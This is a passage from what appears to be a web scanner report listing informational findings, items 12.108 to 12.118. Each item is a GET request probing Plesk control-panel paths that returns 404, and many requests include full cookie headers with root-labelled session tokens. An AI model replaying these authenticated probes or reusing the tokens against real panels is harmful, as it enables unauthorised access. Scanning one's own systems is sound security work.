sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.108. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/overview/

Request

GET /customer/overview/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.109. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/overview/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/overview/id/

Request

GET /customer/overview/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:11 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.110. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/overview/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/overview/id/4

Request

GET /customer/overview/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/personal-info/id/4
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:52 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.111. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/personal-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/personal-info/

Request

GET /customer/personal-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.112. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/personal-info/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/personal-info/id/

Request

GET /customer/personal-info/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.113. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/personal-info/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/personal-info/id/4

Request

GET /customer/personal-info/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.114. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/subscriptions-list-data/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/subscriptions-list-data/

Request

GET /customer/subscriptions-list-data/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.115. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/subscriptions-list-data/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/subscriptions-list-data/id/

Request

GET /customer/subscriptions-list-data/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.116. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/subscriptions-list-data/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/subscriptions-list-data/id/4

Request

GET /customer/subscriptions-list-data/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; reseller_report__report_id=2; psaContext=customers; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; adminclienttrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; sessionslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 16:02:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.117. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/suspend/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer/suspend/

Request

GET /customer/suspend/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:10 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.118. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/toggle/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
